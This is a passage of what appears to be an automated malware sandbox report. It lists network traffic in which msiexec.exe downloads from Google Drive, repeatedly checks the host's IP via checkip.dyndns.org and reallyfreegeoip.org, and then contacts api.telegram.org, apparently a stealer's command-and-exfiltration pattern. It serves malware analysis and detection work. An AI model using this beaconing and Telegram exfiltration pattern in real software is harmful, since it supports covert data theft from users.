                                                                                                                                                                                  Dec 16, 2024 18:29:04.057531118 CET8049761158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:05.424324989 CET8049761158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:05.425813913 CET49765443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:05.425868988 CET44349765104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:05.425985098 CET49765443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:05.426209927 CET49765443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:05.426230907 CET44349765104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:05.472553968 CET4976180192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:06.640319109 CET44349765104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:06.642132044 CET49765443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:06.642229080 CET44349765104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:07.096913099 CET44349765104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:07.096990108 CET44349765104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:07.097084045 CET49765443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:07.097724915 CET49765443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:07.106282949 CET4976180192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:07.107414961 CET4976880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:07.227170944 CET8049761158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:07.227386951 CET4976180192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:07.227777004 CET8049768158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:07.227885962 CET4976880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:07.228050947 CET4976880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:07.347791910 CET8049768158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:08.436230898 CET8049768158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:08.437510967 CET49774443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:08.437597990 CET44349774104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:08.437845945 CET49774443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:08.437956095 CET49774443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:08.437990904 CET44349774104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:08.488262892 CET4976880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:09.685869932 CET44349774104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:09.687465906 CET49774443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:09.687501907 CET44349774104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:10.139029980 CET44349774104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:10.139122963 CET44349774104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:10.139424086 CET49774443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:10.140122890 CET49774443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:10.146505117 CET4976880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:10.147077084 CET4977980192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:10.266858101 CET8049768158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:10.266881943 CET8049779158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:10.267049074 CET4976880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:10.267090082 CET4977980192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:10.267282963 CET4977980192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:10.389045954 CET8049779158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:11.475013018 CET8049779158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:11.476430893 CET49781443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:11.476522923 CET44349781104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:11.476660013 CET49781443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:11.476874113 CET49781443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:11.476908922 CET44349781104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:11.519557953 CET4977980192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:12.708429098 CET44349781104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:12.710028887 CET49781443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:12.710076094 CET44349781104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:13.174031019 CET44349781104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:13.174108028 CET44349781104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:13.174432993 CET49781443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:13.174627066 CET49781443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:13.177759886 CET4977980192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:13.178721905 CET4978780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:13.297971964 CET8049779158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:13.298096895 CET4977980192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:13.298592091 CET8049787158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:13.298687935 CET4978780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:13.298779011 CET4978780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:13.419991016 CET8049787158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:14.506438017 CET8049787158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:14.508114100 CET49792443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:14.508169889 CET44349792104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:14.508605957 CET49792443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:14.508754015 CET49792443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:14.508781910 CET44349792104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:14.550704956 CET4978780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:15.733314991 CET44349792104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:15.735764980 CET49792443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:15.735786915 CET44349792104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:16.426434994 CET44349792104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:16.426491976 CET44349792104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:16.426594019 CET49792443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:16.426959038 CET49792443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:16.430339098 CET4978780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:16.431543112 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:16.551002026 CET8049787158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:16.551101923 CET4978780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:16.551302910 CET8049797158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:16.551404953 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:16.551518917 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:16.671205044 CET8049797158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:17.767580986 CET8049797158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:17.769241095 CET49800443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:17.769296885 CET44349800104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:17.769428968 CET49800443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:17.769731998 CET49800443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:17.769752026 CET44349800104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:17.816356897 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:18.986018896 CET44349800104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:18.988019943 CET49800443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:18.988111973 CET44349800104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:19.459614038 CET44349800104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:19.459707022 CET44349800104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:19.459943056 CET49800443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:19.460345030 CET49800443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:19.488951921 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:19.609277010 CET8049797158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:19.609510899 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:19.629319906 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:19.629420042 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:19.629617929 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:19.629955053 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:19.629975080 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.010432005 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.010642052 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:21.012823105 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:21.012852907 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.013076067 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.014354944 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:21.059334993 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.514730930 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.514905930 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.514977932 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:21.518995047 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:27.617630005 CET4974280192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:27.864825010 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:27.864883900 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:27.865098953 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:27.865300894 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:27.865314960 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:29.230302095 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:29.232424974 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:29.232542038 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:29.232673883 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:29.232686043 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:29.989142895 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:29.989244938 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:29.989326000 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:29.989803076 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:31.519962072 CET49833443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:31.520006895 CET44349833149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:31.520112991 CET49833443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:31.520977020 CET49833443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:31.520992994 CET44349833149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:32.883877993 CET44349833149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:32.885648012 CET49833443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:32.885694981 CET44349833149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:32.885715961 CET49833443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:32.885730982 CET44349833149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:33.543570042 CET44349833149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:33.543788910 CET44349833149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:33.543864012 CET49833443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:33.544275999 CET49833443192.168.2.4149.154.167.220

                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Dec 16, 2024 18:28:41.953442097 CET5792153192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 16, 2024 18:28:42.092575073 CET53579211.1.1.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:44.740622044 CET5548553192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 16, 2024 18:28:44.878988028 CET53554851.1.1.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.456899881 CET6112753192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.595096111 CET53611271.1.1.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:52.709714890 CET6334153192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 16, 2024 18:28:53.164560080 CET53633411.1.1.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:19.489572048 CET6009053192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 16, 2024 18:29:19.628176928 CET53600901.1.1.1192.168.2.4

                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                  Dec 16, 2024 18:28:41.953442097 CET192.168.2.41.1.1.10xb53bStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:28:44.740622044 CET192.168.2.41.1.1.10xc8c7Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:28:50.456899881 CET192.168.2.41.1.1.10x2144Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:28:52.709714890 CET192.168.2.41.1.1.10x1dfeStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:29:19.489572048 CET192.168.2.41.1.1.10x8edeStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                  Dec 16, 2024 18:28:42.092575073 CET1.1.1.1192.168.2.40xb53bNo error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:28:44.878988028 CET1.1.1.1192.168.2.40xc8c7No error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:28:50.595096111 CET1.1.1.1192.168.2.40x2144No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:28:50.595096111 CET1.1.1.1192.168.2.40x2144No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:28:50.595096111 CET1.1.1.1192.168.2.40x2144No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:28:50.595096111 CET1.1.1.1192.168.2.40x2144No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:28:50.595096111 CET1.1.1.1192.168.2.40x2144No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:28:50.595096111 CET1.1.1.1192.168.2.40x2144No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:28:53.164560080 CET1.1.1.1192.168.2.40x1dfeNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:28:53.164560080 CET1.1.1.1192.168.2.40x1dfeNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 16, 2024 18:29:19.628176928 CET1.1.1.1192.168.2.40x8edeNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                  • drive.google.com
                                                                                                                                                                                  • drive.usercontent.google.com
                                                                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                                                                  • api.telegram.org
                                                                                                                                                                                  • checkip.dyndns.org

                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.449738158.101.44.242808012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 16, 2024 18:28:50.720628977 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 16, 2024 18:28:51.925323009 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:28:51 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: cc9b5aa26542e857f18015b15ec6230e
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                                  Dec 16, 2024 18:28:51.928620100 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Dec 16, 2024 18:28:52.303622007 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:28:52 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: 4b22209860fad5356dbde44903818b55
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                                  Dec 16, 2024 18:28:54.864197969 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Dec 16, 2024 18:28:55.238343954 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:28:55 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: 56d354e82e60dd8c62bfe7d3321a28f9
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.449742158.101.44.242808012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 16, 2024 18:28:57.093662024 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Dec 16, 2024 18:28:58.322419882 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:28:58 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: 1cba1f53a282cc88736ca02de597e129
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  2192.168.2.449750158.101.44.242808012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 16, 2024 18:29:00.176654100 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 16, 2024 18:29:02.105992079 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:01 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: b4c5aec3fd19d62f4733b5a0ccf429c3
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  3192.168.2.449761158.101.44.242808012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 16, 2024 18:29:03.937235117 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 16, 2024 18:29:05.424324989 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:05 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: 1b9c47a9265c91e2b79d2abd8b30d147
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
